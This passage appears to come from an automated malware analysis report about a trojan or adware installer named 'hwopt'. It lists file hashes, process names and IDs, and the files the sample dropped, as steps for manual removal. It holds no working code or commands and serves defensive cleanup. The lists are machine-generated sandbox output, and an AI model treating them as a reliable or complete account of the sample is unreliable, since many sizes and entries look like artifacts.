3e29914113ec4b968ba5eb1f6d194a0a | c:\WINDOWS\hwopt_12052016001648\msvcp110.dll |
4ba25d2cbe1587a841dcfb8c8c4a6ea6 | c:\WINDOWS\hwopt_12052016001648\msvcr110.dll |
942895f3bdc894f8e498c5f7d0ab47ae | c:\WINDOWS\hwopt_12052016001648\unins000.exe |
df4217ddb34a0b73dc7aac7829371c0c | c:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe |
fe7bc06af17d7cd8fb8e6d72d72453b8 | c:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe.mui |
95b7f12a557dedac5e4a1e9afa5e73ab | c:\WINDOWS\system32\WindowsPowerShell\v1.0\pspluginwkr.dll |
a94243b797377ba03b63fc716c13bcf5 | c:\WINDOWS\system32\WindowsPowerShell\v1.0\pwrshmsg.dll |
7943a80f1a6fd37969aacd411b511f91 | c:\WINDOWS\system32\WindowsPowerShell\v1.0\pwrshsip.dll |
2c9c9ae86eb2b4e78c8e09deb7509a63 | c:\WINDOWS\system32\WsmAuto.dll |
67146d3606be1111a39f0fd61f47e9b6 | c:\WINDOWS\system32\WsmRes.dll |
18f347402da544a780949b8fdf83351b | c:\WINDOWS\system32\WsmSvc.dll |
296e6992278fea7140d88b603e6c2a8a | c:\WINDOWS\system32\WsmWmiPl.dll |
84e025b1259c66315f4d45a6caecacc9 | c:\WINDOWS\system32\wevtfwd.dll |
cd17705af8e53a82facb545a213ab09c | c:\WINDOWS\system32\winrmprov.dll |
afdf7654880ce23005014895b129d948 | c:\WINDOWS\system32\winrs.exe |
3e9b11880ae4a8ff399ce0573c82655b | c:\WINDOWS\system32\winrscmd.dll |
62021e3e6ba13d72cf5cc1047cfac991 | c:\WINDOWS\system32\winrshost.exe |
b84092e52861a026fc83bcede4a7abfa | c:\WINDOWS\system32\winrsmgr.dll |
35bc7c49676e5ab617ef94dc9854a6f1 | c:\WINDOWS\system32\winrssrv.dll |
972916faac89c4aa978952b30f478e81 | c:\WINDOWS\system32\wsmanhttpconfig.exe |
23ce21efc2ae95700f2b1f9582fe3867 | c:\WINDOWS\system32\wsmplpxy.dll |
faa2fcc6853e5123e05dccc5919657e2 | c:\WINDOWS\system32\wsmprovhost.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
csc.exe:1992
csc.exe:888
csc.exe:444
csc.exe:1532
csc.exe:544
csc.exe:2008
csc.exe:332
csc.exe:1752
csc.exe:1512
07-04-2016_hwopt_3.0.10-1.tmp:432
MSIF2.tmp:3740
netsh.exe:652
netsh.exe:2084
InstallUtil.exe:1744
InstallUtil.exe:2024
clicker.exe:2312
clicker.exe:2452
sc.exe:716
sc.exe:588
sc.exe:2000
sc.exe:456
sc.exe:504
sc.exe:1752
WindowsXP-KB968930-x86-ENG.exe:3496
master.exe:1488
mscorsvw.exe:4020
mscorsvw.exe:3616
mscorsvw.exe:2948
mscorsvw.exe:3756
mscorsvw.exe:2196
mscorsvw.exe:3536
mscorsvw.exe:3676
mscorsvw.exe:3044
mscorsvw.exe:2544
mscorsvw.exe:2564
mscorsvw.exe:1856
mscorsvw.exe:3180
mscorsvw.exe:2660
mscorsvw.exe:2508
mscorsvw.exe:2680
mscorsvw.exe:2872
mscorsvw.exe:3832
mscorsvw.exe:3872
mscorsvw.exe:304
mscorsvw.exe:224
mscorsvw.exe:1556
mscorsvw.exe:2536
mscorsvw.exe:2000
mscorsvw.exe:2412
mscorsvw.exe:2064
wsmanhttpconfig.exe:2848
wsmanhttpconfig.exe:2452
MsiExec.exe:3168
MsiExec.exe:2812
%original file name%.exe:1328
update.exe:3572
PSCustomSetupUtil.exe:2428
PSCustomSetupUtil.exe:3452
PSCustomSetupUtil.exe:3416
PSCustomSetupUtil.exe:2800
PSCustomSetupUtil.exe:3068
PSCustomSetupUtil.exe:3232
PSCustomSetupUtil.exe:2300
PSCustomSetupUtil.exe:2484
PSCustomSetupUtil.exe:2548
PSCustomSetupUtil.exe:3344
PSCustomSetupUtil.exe:2388
PSCustomSetupUtil.exe:2288
PSCustomSetupUtil.exe:3664
PSCustomSetupUtil.exe:2600
PSCustomSetupUtil.exe:2876
PSCustomSetupUtil.exe:3884
PSCustomSetupUtil.exe:2284
PSCustomSetupUtil.exe:3932
PSCustomSetupUtil.exe:2976
PSCustomSetupUtil.exe:3704
PSCustomSetupUtil.exe:3544
PSCustomSetupUtil.exe:3140
PSCustomSetupUtil.exe:3784
PSCustomSetupUtil.exe:3224
PSCustomSetupUtil.exe:3984
PSCustomSetupUtil.exe:3848
regsvr32.exe:3056
regsvr32.exe:2644
summit_sharma.exe:2672
07-04-2016_hwopt_3.0.10-1.exe:1632
XBLive.exe:3008
InstallationStatsUploder_12052016001648.exe:2044
InstallationStatsUploder_12052016001648.exe:1488
InstallationStatsUploder_12052016001648.exe:580
InstallationStatsUploder_12052016001648.exe:1636
InstallationStatsUploder_12052016001648.exe:1860
InstallationStatsUploder_12052016001648.exe:1612
InstallationStatsUploder_12052016001648.exe:640
InstallationStatsUploder_12052016001648.exe:1848
InstallationStatsUploder_12052016001648.exe:508
InstallationStatsUploder_12052016001648.exe:1292
InstallationStatsUploder_12052016001648.exe:1400
EditBinx86.exe:960
EditBinx86.exe:2012
mofcomp.exe:2684
ngen.exe:332
ngen.exe:276
ngen.exe:2092
ngen.exe:3300
ngen.exe:2136
ngen.exe:3212
ngen.exe:2056
ngen.exe:3340
ngen.exe:2248
ngen.exe:3160
ngen.exe:2112
ngen.exe:2240
ngen.exe:3232
ngen.exe:444
ngen.exe:1496
ngen.exe:2188
ngen.exe:2212
ngen.exe:2276
ngen.exe:780
ngen.exe:3224
ngen.exe:2024
ngen.exe:2160
ngen.exe:2148
runonce.exe:3520
cvtres.exe:308
cvtres.exe:1968
cvtres.exe:1556
cvtres.exe:952
cvtres.exe:1064
cvtres.exe:340
cvtres.exe:164
cvtres.exe:504
cvtres.exe:364
Osman_Navigation.exe:4072
PSSetupNativeUtils.exe:968
fileman.exe:1636
mastermind.exe:3740
grpconv.exe:3484 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\pgamidov.dll (4150 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSCF.tmp (664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pgamidov.out (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2q171lzo.dll (4150 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2q171lzo.out (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSCB.tmp (664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSC7.tmp (664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4_rcyvsa.dll (4150 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4_rcyvsa.out (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\kgul_apy.dll (4150 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSCD.tmp (664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\kgul_apy.out (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\8sqkbrnw.out (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSC5.tmp (664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\8sqkbrnw.dll (4150 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\xlrctlov.out (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSC11.tmp (664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\xlrctlov.dll (4150 bytes)
%WinDir%\Temp\4p64sgqi.dll (4150 bytes)
%WinDir%\Temp\4p64sgqi.out (396 bytes)
%WinDir%\Temp\CSC13.tmp (664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\uuxr7wdt.out (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSC3.tmp (664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\uuxr7wdt.dll (4150 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSC9.tmp (664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\spcebjga.dll (4150 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\spcebjga.out (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\EditBinx86.exe (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\x86_WinDivert.zip (9 bytes)
%WinDir%\hwopt_12052016001648\unins000.dat (9300 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-SG5DG.tmp (5873 bytes)
%WinDir%\hwopt_12052016001648\Utils.dll (57 bytes)
%WinDir%\hwopt_12052016001648\is-JSA3M.tmp (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\is-39PQT.tmp (28 bytes)
%WinDir%\hwopt_12052016001648\is-3HV2J.tmp (28 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-11RFO.tmp (601 bytes)
%WinDir%\hwopt_12052016001648\addon\is-RR6J5.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\is-QADEL.tmp (9 bytes)
%WinDir%\hwopt_12052016001648\is-NGNQK.tmp (6841 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-KE3G3.tmp (5441 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-0GUHR.tmp (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\_isetup\_shfoldr.dll (23 bytes)
%WinDir%\hwopt_12052016001648\is-KKUTO.tmp (3361 bytes)
%WinDir%\hwopt_12052016001648\addon\is-H19H5.tmp (18 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-4A1SP.tmp (14 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-TJDF4.tmp (12 bytes)
%WinDir%\hwopt_12052016001648\addon\is-TRQBO.tmp (12287 bytes)
%WinDir%\hwopt_12052016001648\addon\is-1J7I3.tmp (1 bytes)
%WinDir%\hwopt_12052016001648\is-7B37I.tmp (20 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-J0U8C.tmp (601 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-22OLL.tmp (2105 bytes)
%WinDir%\hwopt_12052016001648\is-480KO.tmp (31 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-37BTT.tmp (673 bytes)
%WinDir%\hwopt_12052016001648\addon\is-3PU0B.tmp (5441 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\fileman.exe (673 bytes)
%WinDir%\hwopt_12052016001648\addon\is-NUNLD.tmp (985 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-VTGNO.tmp (601 bytes)
%WinDir%\hwopt_12052016001648\is-1JNQO.tmp (25361 bytes)
%WinDir%\hwopt_12052016001648\addon\is-B1DBC.tmp (673 bytes)
%WinDir%\hwopt_12052016001648\addon\is-SVUH5.tmp (424 bytes)
%WinDir%\hwopt_12052016001648\addon\is-FLV5J.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\Utilsx86.dll (57 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-FCRIP.tmp (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\is-LKUF0.tmp (57 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-SI3J3.tmp (673 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-PL8C4.tmp (1281 bytes)
%WinDir%\hwopt_12052016001648\addon\is-4S0ED.tmp (31 bytes)
%WinDir%\hwopt_12052016001648\addon\is-DNIFE.tmp (6841 bytes)
%WinDir%\hwopt_12052016001648\addon\is-HP0LE.tmp (1 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-LS6F4.tmp (6841 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\is-ADFMM.tmp (673 bytes)
%WinDir%\hwopt_12052016001648\is-V18V5.tmp (16 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-5O5GC.tmp (1281 bytes)
%WinDir%\hwopt_12052016001648\is-LDP3M.tmp (2321 bytes)
%WinDir%\hwopt_12052016001648\is-2JF6C.tmp (16 bytes)
%WinDir%\hwopt_12052016001648\addon\is-H96Q4.tmp (7345 bytes)
%WinDir%\hwopt_12052016001648\WinDivert.dll (18 bytes)
%WinDir%\hwopt_12052016001648\addon\is-T8IBT.tmp (7971 bytes)
%WinDir%\hwopt_12052016001648\hwopt12052016001648.InstallLog (732 bytes)
%System%\config\SYSTEM.LOG (4777 bytes)
%WinDir%\hwopt_12052016001648\hwopt12052016001648.InstallState (196 bytes)
%System%\config\system (1723 bytes)
C:\$Directory (288 bytes)
%WinDir%\hwopt_12052016001648\InstallUtil.InstallLog (672 bytes)
%WinDir%\hwopt_12052016001648\hwopt12052016001648_updater_service.InstallState (196 bytes)
%WinDir%\hwopt_12052016001648\hwopt12052016001648_updater_service.InstallLog (876 bytes)
%Documents and Settings%\%current user%\Application Data\b_dk.jpg (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw16.tmp (7405 bytes)
%Documents and Settings%\%current user%\Application Data\chapter.gif (7192 bytes)
%Documents and Settings%\%current user%\Application Data\1.png (234 bytes)
%Documents and Settings%\%current user%\Application Data\28.svg (1 bytes)
%Documents and Settings%\%current user%\Application Data\TerraceSawwortSouthernwood (2 bytes)
%Documents and Settings%\%current user%\Application Data\septillions.dll (6 bytes)
%Documents and Settings%\%current user%\Application Data\System.dll (11 bytes)
%Documents and Settings%\%current user%\Application Data\make.graphic.viewport.xml (1 bytes)
C:\f1fab1e3e4f7fec893e8\update\update.exe (10748 bytes)
C:\f1fab1e3e4f7fec893e8\about_language_keywords.help.txt (11 bytes)
C:\f1fab1e3e4f7fec893e8\about_if.help.txt (3 bytes)
C:\f1fab1e3e4f7fec893e8\windowsremotemanagement.adm (574 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.editor.dll (14450 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.backgroundintelligenttransfer.management.interop.dll (1532 bytes)
C:\f1fab1e3e4f7fec893e8\about_modules.help.txt (13 bytes)
C:\f1fab1e3e4f7fec893e8\update\updspapi.dll (5940 bytes)
C:\f1fab1e3e4f7fec893e8\winrm.cmd (35 bytes)
C:\f1fab1e3e4f7fec893e8\system.management.automation.dll-help.xml (16567 bytes)
C:\f1fab1e3e4f7fec893e8\about_scripts.help.txt (12 bytes)
C:\f1fab1e3e4f7fec893e8\about_wildcards.help.txt (3 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.backgroundintelligenttransfer.management.dll (1537 bytes)
C:\f1fab1e3e4f7fec893e8\about_aliases.help.txt (6 bytes)
C:\f1fab1e3e4f7fec893e8\about_type_operators.help.txt (5 bytes)
C:\f1fab1e3e4f7fec893e8\registry.format.ps1xml (20 bytes)
C:\f1fab1e3e4f7fec893e8\about_try_catch_finally.help.txt (7 bytes)
C:\f1fab1e3e4f7fec893e8\wsmauto.mof (4 bytes)
C:\f1fab1e3e4f7fec893e8\about_regular_expressions.help.txt (5 bytes)
C:\f1fab1e3e4f7fec893e8\about_methods.help.txt (6 bytes)
C:\f1fab1e3e4f7fec893e8\winrm.ini (1956 bytes)
C:\f1fab1e3e4f7fec893e8\types.ps1xml (2510 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.security.resources.dll (9 bytes)
C:\f1fab1e3e4f7fec893e8\wtrinstaller.ico (4803 bytes)
C:\f1fab1e3e4f7fec893e8\wsmprovhost.exe (657 bytes)
C:\f1fab1e3e4f7fec893e8\about_while.help.txt (2 bytes)
C:\f1fab1e3e4f7fec893e8\about_parsing.help.txt (2 bytes)
C:\f1fab1e3e4f7fec893e8\wsman.format.ps1xml (837 bytes)
C:\f1fab1e3e4f7fec893e8\dotnettypes.format.ps1xml (266 bytes)
C:\f1fab1e3e4f7fec893e8\about_trap.help.txt (10 bytes)
C:\f1fab1e3e4f7fec893e8\about_bits_cmdlets.help.txt (7 bytes)
C:\f1fab1e3e4f7fec893e8\spuninst.exe (3787 bytes)
C:\f1fab1e3e4f7fec893e8\about_script_internationalization.help.txt (9 bytes)
C:\f1fab1e3e4f7fec893e8\system.management.automation.resources.dll (3153 bytes)
C:\f1fab1e3e4f7fec893e8\powershell_ise.exe (2526 bytes)
C:\f1fab1e3e4f7fec893e8\pssetupnativeutils.exe (9 bytes)
C:\f1fab1e3e4f7fec893e8\wsmauto.dll (1842 bytes)
C:\f1fab1e3e4f7fec893e8\powershellcore.format.ps1xml (1492 bytes)
C:\f1fab1e3e4f7fec893e8\pspluginwkr.dll (1756 bytes)
C:\f1fab1e3e4f7fec893e8\powershelltrace.format.ps1xml (344 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.diagnostics.dll-help.xml (2301 bytes)
C:\f1fab1e3e4f7fec893e8\about_do.help.txt (2 bytes)
C:\f1fab1e3e4f7fec893e8\about_variables.help.txt (6 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.utility.resources.dll (508 bytes)
C:\f1fab1e3e4f7fec893e8\update\update.inf (2457 bytes)
C:\f1fab1e3e4f7fec893e8\about_path_syntax.help.txt (5 bytes)
C:\f1fab1e3e4f7fec893e8\winrmprov.mof (789 bytes)
C:\f1fab1e3e4f7fec893e8\about_operators.help.txt (770 bytes)
C:\f1fab1e3e4f7fec893e8\about_reserved_words.help.txt (1 bytes)
C:\f1fab1e3e4f7fec893e8\about_parameters.help.txt (9 bytes)
C:\f1fab1e3e4f7fec893e8\windowsremoteshell.adm (12 bytes)
C:\f1fab1e3e4f7fec893e8\compiledcomposition.microsoft.powershell.gpowershell.dll (1737 bytes)
C:\f1fab1e3e4f7fec893e8\about_types.ps1xml.help.txt (481 bytes)
C:\f1fab1e3e4f7fec893e8\about_pssession_details.help.txt (9 bytes)
C:\f1fab1e3e4f7fec893e8\about_ref.help.txt (1 bytes)
C:\f1fab1e3e4f7fec893e8\default.help.txt (2 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.wsman.runtime.dll (33 bytes)
C:\f1fab1e3e4f7fec893e8\about_transactions.help.txt (1011 bytes)
C:\f1fab1e3e4f7fec893e8\about_comment_based_help.help.txt (595 bytes)
C:\f1fab1e3e4f7fec893e8\about_pssnapins.help.txt (6 bytes)
C:\f1fab1e3e4f7fec893e8\about_core_commands.help.txt (221 bytes)
C:\f1fab1e3e4f7fec893e8\eventforwarding.adm (2 bytes)
C:\f1fab1e3e4f7fec893e8\about_format.ps1xml.help.txt (17 bytes)
C:\f1fab1e3e4f7fec893e8\about_hash_tables.help.txt (6 bytes)
C:\f1fab1e3e4f7fec893e8\pwrshplugin.dll (802 bytes)
C:\f1fab1e3e4f7fec893e8\about_eventlogs.help.txt (5 bytes)
C:\f1fab1e3e4f7fec893e8\certificate.format.ps1xml (155 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.management.resources.dll (508 bytes)
C:\f1fab1e3e4f7fec893e8\about_ws-management_cmdlets.help.txt (405 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.gpowershell.dll (9738 bytes)
C:\f1fab1e3e4f7fec893e8\importallmodules.psd1 (438 bytes)
C:\f1fab1e3e4f7fec893e8\pwrshsip.dll (24 bytes)
C:\f1fab1e3e4f7fec893e8\about_remote_troubleshooting.help.txt (146 bytes)
C:\f1fab1e3e4f7fec893e8\wsmwmipl.dll (2816 bytes)
C:\f1fab1e3e4f7fec893e8\about_requires.help.txt (2 bytes)
C:\f1fab1e3e4f7fec893e8\about_command_syntax.help.txt (5 bytes)
C:\f1fab1e3e4f7fec893e8\about_remote_faq.help.txt (775 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.gpowershell.resources.dll (408 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.management.dll (3386 bytes)
C:\f1fab1e3e4f7fec893e8\about_wmi_cmdlets.help.txt (8 bytes)
C:\f1fab1e3e4f7fec893e8\about_functions_advanced_methods.help.txt (9 bytes)
C:\f1fab1e3e4f7fec893e8\getevent.types.ps1xml (15 bytes)
C:\f1fab1e3e4f7fec893e8\about_split.help.txt (10 bytes)
C:\f1fab1e3e4f7fec893e8\wsmsvc.dll (15909 bytes)
C:\f1fab1e3e4f7fec893e8\profile.ps1 (772 bytes)
C:\f1fab1e3e4f7fec893e8\about_locations.help.txt (794 bytes)
C:\f1fab1e3e4f7fec893e8\about_pipelines.help.txt (411 bytes)
C:\f1fab1e3e4f7fec893e8\pwrshmsg.dll (4 bytes)
C:\f1fab1e3e4f7fec893e8\winrsmgr.dll (2 bytes)
C:\f1fab1e3e4f7fec893e8\update\spcustom.dll (23 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.consolehost.dll-help.xml (900 bytes)
C:\f1fab1e3e4f7fec893e8\about_functions_advanced_parameters.help.txt (962 bytes)
C:\f1fab1e3e4f7fec893e8\about_remote.help.txt (7 bytes)
C:\f1fab1e3e4f7fec893e8\wsmpty.xsl (1 bytes)
C:\f1fab1e3e4f7fec893e8\update\update.ver (14 bytes)
C:\f1fab1e3e4f7fec893e8\about_properties.help.txt (7 bytes)
C:\f1fab1e3e4f7fec893e8\about_break.help.txt (792 bytes)
C:\f1fab1e3e4f7fec893e8\about_quoting_rules.help.txt (659 bytes)
C:\f1fab1e3e4f7fec893e8\spupdsvc.exe (287 bytes)
C:\f1fab1e3e4f7fec893e8\about_functions_advanced.help.txt (3 bytes)
C:\f1fab1e3e4f7fec893e8\wsmtxt.xsl (2 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.utility.dll (9684 bytes)
C:\f1fab1e3e4f7fec893e8\about_redirection.help.txt (2 bytes)
C:\f1fab1e3e4f7fec893e8\winrs.exe (1154 bytes)
C:\f1fab1e3e4f7fec893e8\help.format.ps1xml (3947 bytes)
C:\f1fab1e3e4f7fec893e8\wsmres.dll (6164 bytes)
C:\f1fab1e3e4f7fec893e8\winrssrv.dll (12 bytes)
C:\f1fab1e3e4f7fec893e8\about_continue.help.txt (1 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.wsman.management.dll (5010 bytes)
C:\f1fab1e3e4f7fec893e8\about_return.help.txt (3 bytes)
C:\f1fab1e3e4f7fec893e8\about_objects.help.txt (2 bytes)
C:\f1fab1e3e4f7fec893e8\about_environment_variables.help.txt (417 bytes)
C:\f1fab1e3e4f7fec893e8\update\kb968930xp.cat (512 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.consolehost.resources.dll (778 bytes)
C:\f1fab1e3e4f7fec893e8\about_remote_jobs.help.txt (13 bytes)
C:\f1fab1e3e4f7fec893e8\bitstransfer.psd1 (950 bytes)
C:\f1fab1e3e4f7fec893e8\about_remote_requirements.help.txt (6 bytes)
C:\f1fab1e3e4f7fec893e8\about_remote_output.help.txt (887 bytes)
C:\f1fab1e3e4f7fec893e8\about_functions_cmdletbindingattribute.help.txt (3 bytes)
C:\f1fab1e3e4f7fec893e8\about_script_blocks.help.txt (3 bytes)
C:\f1fab1e3e4f7fec893e8\about_profiles.help.txt (457 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.diagnostics.resources.dll (470 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.wsman.management.resources.dll (13 bytes)
C:\f1fab1e3e4f7fec893e8\winrscmd.dll (2907 bytes)
C:\f1fab1e3e4f7fec893e8\about_arrays.help.txt (8 bytes)
C:\f1fab1e3e4f7fec893e8\about_signing.help.txt (12 bytes)
C:\f1fab1e3e4f7fec893e8\about_automatic_variables.help.txt (14 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.utility.dll-help.xml (20810 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.graphicalhost.resources.dll (16 bytes)
C:\f1fab1e3e4f7fec893e8\spmsg.dll (495 bytes)
C:\f1fab1e3e4f7fec893e8\about_windows_powershell_ise.help.txt (6 bytes)
C:\f1fab1e3e4f7fec893e8\about_data_sections.help.txt (5 bytes)
C:\f1fab1e3e4f7fec893e8\about_providers.help.txt (59 bytes)
C:\f1fab1e3e4f7fec893e8\powershell_ise.resources.dll (4 bytes)
C:\f1fab1e3e4f7fec893e8\about_debuggers.help.txt (21 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.editor.resources.dll (562 bytes)
C:\f1fab1e3e4f7fec893e8\pscustomsetuputil.exe (316 bytes)
C:\f1fab1e3e4f7fec893e8\winrmprov.dll (591 bytes)
C:\f1fab1e3e4f7fec893e8\diagnostics.format.ps1xml (590 bytes)
C:\f1fab1e3e4f7fec893e8\about_logical_operators.help.txt (2 bytes)
C:\f1fab1e3e4f7fec893e8\about_line_editing.help.txt (1 bytes)
C:\f1fab1e3e4f7fec893e8\about_command_precedence.help.txt (8 bytes)
C:\f1fab1e3e4f7fec893e8\filesystem.format.ps1xml (133 bytes)
C:\f1fab1e3e4f7fec893e8\powershell.exe.mui (10 bytes)
C:\f1fab1e3e4f7fec893e8\about_session_configurations.help.txt (276 bytes)
C:\f1fab1e3e4f7fec893e8\about_prompts.help.txt (7 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.security.dll (1145 bytes)
C:\f1fab1e3e4f7fec893e8\about_assignment_operators.help.txt (379 bytes)
C:\f1fab1e3e4f7fec893e8\$shtdwn$.req (788 bytes)
C:\f1fab1e3e4f7fec893e8\bitstransfer.format.ps1xml (16 bytes)
C:\f1fab1e3e4f7fec893e8\windowspowershellhelp.chm (26041 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.graphicalhost.dll (4408 bytes)
C:\f1fab1e3e4f7fec893e8\about_execution_policies.help.txt (13 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.wsman.management.dll-help.xml (8740 bytes)
C:\f1fab1e3e4f7fec893e8\about_switch.help.txt (489 bytes)
C:\f1fab1e3e4f7fec893e8\about_throw.help.txt (5 bytes)
C:\f1fab1e3e4f7fec893e8\about_join.help.txt (2 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.security.dll-help.xml (1797 bytes)
C:\f1fab1e3e4f7fec893e8\wevtfwd.dll (3351 bytes)
C:\f1fab1e3e4f7fec893e8\about_escape_characters.help.txt (2 bytes)
C:\f1fab1e3e4f7fec893e8\update\eula.txt (586 bytes)
C:\f1fab1e3e4f7fec893e8\winrm.vbs (2727 bytes)
C:\f1fab1e3e4f7fec893e8\about_comparison_operators.help.txt (11 bytes)
C:\f1fab1e3e4f7fec893e8\about_arithmetic_operators.help.txt (168 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.backgroundintelligenttransfer.management.dll-help.xml (2472 bytes)
C:\f1fab1e3e4f7fec893e8\about_functions.help.txt (586 bytes)
C:\f1fab1e3e4f7fec893e8\about_special_characters.help.txt (3 bytes)
C:\f1fab1e3e4f7fec893e8\winrshost.exe (22 bytes)
C:\f1fab1e3e4f7fec893e8\about_jobs.help.txt (12 bytes)
C:\f1fab1e3e4f7fec893e8\about_scopes.help.txt (76 bytes)
C:\f1fab1e3e4f7fec893e8\about_commonparameters.help.txt (12 bytes)
C:\f1fab1e3e4f7fec893e8\wsmplpxy.dll (603 bytes)
C:\f1fab1e3e4f7fec893e8\about_preference_variables.help.txt (37 bytes)
C:\f1fab1e3e4f7fec893e8\about_foreach.help.txt (10 bytes)
C:\f1fab1e3e4f7fec893e8\about_windows_powershell_2.0.help.txt (453 bytes)
C:\f1fab1e3e4f7fec893e8\about_history.help.txt (3 bytes)
C:\f1fab1e3e4f7fec893e8\wsmanhttpconfig.exe (3009 bytes)
C:\f1fab1e3e4f7fec893e8\about_pssessions.help.txt (9 bytes)
C:\f1fab1e3e4f7fec893e8\about_job_details.help.txt (824 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.backgroundintelligenttransfer.management.resources.dll (7 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.management.dll-help.xml (28236 bytes)
C:\f1fab1e3e4f7fec893e8\about_for.help.txt (146 bytes)
%WinDir%\Temp\4p64sgqi.cmdline (358 bytes)
%WinDir%\Temp\4p64sgqi.0.cs (676 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPFE.tmp\Microsoft.PowerShell.ConsoleHost.dll (33378 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPFC.tmp\Microsoft.PowerShell.Commands.Management.dll (45020 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPFB.tmp\Microsoft.PowerShell.Commands.Diagnostics.dll (33116 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPF6.tmp\Microsoft.BackgroundIntelligentTransfer.Management.dll (27440 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAP104.tmp\Microsoft.WSMan.Runtime.dll (17713 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPFD.tmp\Microsoft.PowerShell.Commands.Utility.dll (40638 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAP101.tmp\Microsoft.PowerShell.GraphicalHost.dll (47422 bytes)
